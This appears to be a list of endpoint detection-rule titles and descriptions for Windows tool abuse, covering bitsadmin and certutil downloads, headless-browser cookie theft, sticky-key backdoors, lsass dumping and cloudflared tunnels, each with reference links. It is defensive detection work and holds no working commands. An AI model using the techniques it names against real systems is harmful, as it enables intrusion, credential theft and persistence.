BitLockerTogo.EXE Execution Detects the execution of "BitLockerToGo.EXE". BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system. This is a rarely used application and usage of it at all is worth investigating. Malware such as Lumma stealer has been seen using this process as a target for process hollowing. https://tria.ge/240521-ynezpagf56/behavioral1, https://any.run/report/6eea2773c1b4b5c6fb7c142933e220c96f9a4ec89055bf0cf54accdcde7df535/a407f006-ee45-420d-b576-f259094df091, https://bazaar.abuse.ch/sample/8c75f8e94486f5bbf461505823f5779f328c5b37f1387c18791e0c21f3fdd576/, https://bazaar.abuse.ch/sample/64e6605496919cd76554915cbed88e56fdec10dec6523918a631754664b8c8d3/
Uncommon Child Process Of BgInfo.EXE Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/, https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
Suspicious Download From Direct IP Via Bitsadmin Detects usage of bitsadmin downloading a file using an URL that contains an IP https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/, https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/
File Download Via Bitsadmin Detects usage of bitsadmin downloading a file https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
Suspicious Download From File-Sharing Website Via Bitsadmin Detects usage of bitsadmin downloading a file from a suspicious domain https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker, https://www.cisa.gov/uscert/ncas/alerts/aa22-321a, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/
File With Suspicious Extension Downloaded Via Bitsadmin Detects usage of bitsadmin downloading a file with a suspicious extension https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
File Download Via Bitsadmin To A Suspicious Target Folder Detects usage of bitsadmin downloading a file to a suspicious target folder https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/, https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/
File Download Via Bitsadmin To An Uncommon Target Folder Detects usage of bitsadmin downloading a file to uncommon target folder https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/, https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/
Monitoring For Persistence Via BITS BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded. https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html, http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html, https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
Potential Data Stealing Via Chromium Headless Debugging Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control https://github.com/defaultnamehere/cookie_crimes/, https://mango.pdf.zone/stealing-chrome-cookies-without-a-password, https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/, https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/
Browser Execution In Headless Mode Detects execution of Chromium based browser in headless mode https://twitter.com/mrd0x/status/1478234484881436672?s=12, https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html
File Download with Headless Browser Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files https://twitter.com/mrd0x/status/1478234484881436672?s=12, https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html
Chromium Browser Instance Executed With Custom Extension Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension https://redcanary.com/blog/chromeloader/, https://emkc.org/s/RJjuLa, https://www.mandiant.com/resources/blog/lnk-between-browsers
Chromium Browser Headless Execution To Mockbin Like Site Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data). https://www.zscaler.com/blogs/security-research/steal-it-campaign
Suspicious Chromium Browser Instance Executed With Custom Extension Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension https://redcanary.com/blog/chromeloader/, https://emkc.org/s/RJjuLa, https://www.mandiant.com/resources/blog/lnk-between-browsers
File Download From Browser Process Via Inline URL Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state. https://twitter.com/mrd0x/status/1478116126005641220, https://lolbas-project.github.io/lolbas/Binaries/Msedge/
Browser Started with Remote Debugging Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf, https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/, https://github.com/defaultnamehere/cookie_crimes/, https://github.com/wunderwuzzi23/firefox-cookiemonster
Tor Client/Browser Execution Detects the use of Tor or Tor-Browser to connect to onion routing networks https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/
Suspicious Calculator Usage Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion. https://twitter.com/ItsReallyNick/status/1094080242686312448
Potential Binary Proxy Execution Via Cdb.EXE Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/, https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html, https://twitter.com/nas_bench/status/1534957360032120833
New Root Certificate Installed Via CertMgr.EXE Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system. Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md, https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/
File Download via CertOC.EXE Detects when a user downloads a file by using CertOC.exe https://lolbas-project.github.io/lolbas/Binaries/Certoc/
File Download From IP Based URL Via CertOC.EXE Detects when a user downloads a file from an IP based URL using CertOC.exe https://lolbas-project.github.io/lolbas/Binaries/Certoc/
DLL Loaded via CertOC.EXE Detects when a user installs certificates by using CertOC.exe to loads the target DLL file. https://twitter.com/sblmsrsn/status/1445758411803480072?s=20, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2, https://lolbas-project.github.io/lolbas/Binaries/Certoc/
Suspicious DLL Loaded via CertOC.EXE Detects when a user installs certificates by using CertOC.exe to load the target DLL file. https://twitter.com/sblmsrsn/status/1445758411803480072?s=20, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2, https://lolbas-project.github.io/lolbas/Binaries/Certoc/
New Root Certificate Installed Via Certutil.EXE Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system. Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md
File Decoded From Base64/Hex Via Certutil.EXE Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil, https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/, https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/, https://twitter.com/JohnLaTwC/status/835149808817991680, https://learn.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil, https://lolbas-project.github.io/lolbas/Binaries/Certutil/
Suspicious Download Via Certutil.EXE Detects the execution of certutil with certain flags that allow the utility to download files. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil, https://forensicitguy.github.io/agenttesla-vba-certutil-download/, https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/, https://twitter.com/egre55/status/1087685529016193025, https://lolbas-project.github.io/lolbas/Binaries/Certutil/
Suspicious File Downloaded From Direct IP Via Certutil.EXE Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil, https://forensicitguy.github.io/agenttesla-vba-certutil-download/, https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/, https://twitter.com/egre55/status/1087685529016193025, https://lolbas-project.github.io/lolbas/Binaries/Certutil/, https://twitter.com/_JohnHammond/status/1708910264261980634
Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil, https://forensicitguy.github.io/agenttesla-vba-certutil-download/, https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/, https://twitter.com/egre55/status/1087685529016193025, https://lolbas-project.github.io/lolbas/Binaries/Certutil/, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/
File Encoded To Base64 Via Certutil.EXE Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil, https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/, https://lolbas-project.github.io/lolbas/Binaries/Certutil/
Potential NTLM Coercion Via Certutil.EXE Detects possible NTLM coercion via certutil using the 'syncwithWU' flag https://github.com/LOLBAS-Project/LOLBAS/issues/243
Suspicious File Encoded To Base64 Via Certutil.EXE Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior, https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior, https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior, https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior
File In Suspicious Location Encoded To Base64 Via Certutil.EXE Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior, https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior, https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior, https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior
Certificate Exported Via Certutil.EXE Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates. https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html
Suspicious CodePage Switch Via CHCP Detects a code page switch in command line or batch scripts to a rare language https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers, https://twitter.com/cglyer/status/1183756892952248325
Console CodePage Lookup Via CHCP Detects use of chcp to look up the system locale value as part of host discovery https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/chcp
Deleted Data Overwritten Via Cipher.EXE Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk. Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive
Process Access via TrolleyExpress Exclusion Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory https://twitter.com/_xpn_/status/1491557187168178176, https://www.youtube.com/watch?v=Ie831jF0bb0
Data Copied To Clipboard Via Clip.EXE Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/clip, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md
Cloudflared Portable Execution Detects the execution of the "cloudflared" binary from a non standard location. https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/, https://github.com/cloudflare/cloudflared, https://www.intrinsec.com/akira_ransomware/, https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/, https://github.com/cloudflare/cloudflared/releases
Cloudflared Quick Tunnel Execution Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB. The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com. The tool has been observed in use by threat groups including Akira ransomware. https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/, https://github.com/cloudflare/cloudflared, https://www.intrinsec.com/akira_ransomware/, https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/
Cloudflared Tunnel Connections Cleanup Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections. https://github.com/cloudflare/cloudflared, https://developers.cloudflare.com/cloudflare-one/connections/connect-apps
Cloudflared Tunnel Execution Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks. https://blog.reconinfosec.com/emergence-of-akira-ransomware-group, https://github.com/cloudflare/cloudflared, https://developers.cloudflare.com/cloudflare-one/connections/connect-apps
New Generic Credentials Added Via Cmdkey.EXE Detects usage of "cmdkey.exe" to add generic credentials. As an example, this can be used before connecting to an RDP session via command line interface. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol
Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE Detects usage of cmdkey to look for cached credentials on the system https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation, https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx, https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1003.005/T1003.005.md#atomic-test-1---cached-credential-dump-via-cmdkey
Change Default File Association Via Assoc Detects file association changes using the builtin "assoc" command. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md
Potential Arbitrary File Download Via Cmdl32.EXE Detects execution of Cmdl32 with the "/vpn" and "/lan" flags. Attackers can abuse this utility in order to download arbitrary files via a configuration file. Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious. https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/, https://twitter.com/SwiftOnSecurity/status/1455897435063074824, https://github.com/LOLBAS-Project/LOLBAS/pull/151
Change Default File Association To Executable Via Assoc Detects when a program changes the default file association of any extension to an executable. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/assoc
Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share https://thedfirreport.com/2022/09/26/bumblebee-round-two/
Curl Download And Execute Combination Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later. https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983
File Deletion Via Del Detects execution of the builtin "del"/"erase" commands in order to delete files. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase
Greedy File Deletion Using Del Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence. https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase
File And SubFolder Enumeration Via Dir Command Detects usage of the "dir" command part of Widows CMD with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md
Potential Dosfuscation Activity Detects possible payload obfuscation via the commandline https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf, https://github.com/danielbohannon/Invoke-DOSfuscation
Command Line Execution with Suspicious URL and AppData Strings Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell) https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100, https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100
Potential Privilege Escalation Using Symlink Between Osk and Cmd Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in. https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md, https://ss64.com/nt/mklink.html
VolumeShadowCopy Symlink Creation Via Mklink Shadow Copies storage symbolic link creation using operating systems utilities https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
Suspicious File Execution From Internet Hosted WebDav Share Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files https://twitter.com/ShadowChasing1/status/1552595370961944576, https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior
Cmd.EXE Missing Space Characters Execution Anomaly Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe. This could be a sign of obfuscation of a fat finger problem (typo by the developer). https://twitter.com/cyb3rops/status/1562072617552678912, https://ss64.com/nt/cmd.html
Potential CommandLine Path Traversal Via Cmd.EXE Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/, https://twitter.com/Oddvarmoe/status/1270633613449723905
NtdllPipe Like Activity Execution Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe
Potentially Suspicious Ping/Copy Command Combination Detects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware. Internal Research
Suspicious Ping/Del Command Combination Detects a method often used by ransomware. Which combines the "ping" to wait a couple of seconds and then "del" to delete the file in question. Its used to hide the file responsible for the initial infection for example https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf, https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware
Potentially Suspicious CMD Shell Output Redirect Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location. This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration. https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
Directory Removal Via Rmdir Detects execution of the builtin "rmdir" command in order to delete directories. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase
Copy From VolumeShadowCopy Via Cmd.EXE Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use) https://twitter.com/vxunderground/status/1423336151860002816?s=20, https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection, https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/
Read Contents From Stdin Via Cmd.EXE Detect the use of "<" to read and potentially execute a file via cmd.exe https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md, https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe
Persistence Via Sticky Key Backdoor By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system. When the sticky keys are "activated" the privilleged shell is launched. https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html, https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf, https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors
Sticky Key Like Backdoor Execution Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors
Potential Download/Upload Activity Using Type Command Detects usage of the "type" command to download/upload data from WebDAV server https://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22
Unusual Parent Process For Cmd.EXE Detects suspicious parent process for cmd.exe https://www.elastic.co/guide/en/security/current/unusual-parent-process-for-cmd.exe.html
CMSTP Execution Process Creation Detects various indicators of Microsoft Connection Manager Profile Installer execution https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
Arbitrary File Download Via ConfigSecurityPolicy.EXE Detects the execution of "ConfigSecurityPolicy.EXE", a binary part of Windows Defender used to manage settings in Windows Defender. Users can configure different pilot collections for each of the co-management workloads. It can be abused by attackers in order to upload or download files. https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/
Powershell Executed From Headless ConHost Process Detects the use of powershell commands from headless ConHost window. The "--headless" flag hides the windows from the user upon execution. https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software
Suspicious High IntegrityLevel Conhost Legacy Option ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context. https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29, https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/, https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control
Conhost.exe CommandLine Path Traversal detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking https://pentestlab.blog/2020/07/06/indirect-command-execution/
Uncommon Child Process Of Conhost.EXE Detects uncommon "conhost" child processes. This could be a sign of "conhost" usage as a LOLBIN or potential process injection activity. http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/
Conhost Spawned By Uncommon Parent Process Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity. https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html
Control Panel Items Detects the malicious use of a control panel item https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins
CreateDump Process Dump Detects uses of the createdump.exe LOLOBIN utility to dump process memory https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/, https://twitter.com/bopin2020/status/1366400799199272960
Dynamic .NET Compilation Via Csc.EXE Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages. https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/, https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf, https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/, https://twitter.com/gN3mes1s/status/1206874118282448897, https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1027.004/T1027.004.md#atomic-test-1---compile-after-delivery-using-cscexe
Csc.EXE Execution Form Potentially Suspicious Parent Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery. https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing, https://reaqta.com/2017/11/short-journey-darkvnc/, https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html
Suspicious Csi.exe Usage Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe' https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/, https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/, https://twitter.com/Z3Jpa29z/status/1317545798981324801
Suspicious Use of CSharp Interactive Console Detects the execution of CSharp interactive console by PowerShell https://redcanary.com/blog/detecting-attacks-leveraging-the-net-framework/
Active Directory Structure Export Via Csvde.EXE Detects the execution of "csvde.exe" in order to export organizational Active Directory structure. https://www.cybereason.com/blog/research/operation-ghostshell-novel-rat-targets-global-aerospace-and-telecoms-firms, https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit, https://redcanary.com/blog/msix-installers/
Potential Cookies Session Hijacking Detects execution of "curl.exe" with the "-c" flag in order to save cookie data. https://curl.se/docs/manpage.html
Curl Web Request With Potential Custom User-Agent Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv
File Download From IP URL Via Curl.EXE Detects file downloads directly from IP address URL using curl.exe https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv, https://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt
Suspicious File Download From IP Via Curl.EXE Detects potentially suspicious file downloads directly from IP addresses using curl.exe https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv, https://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt
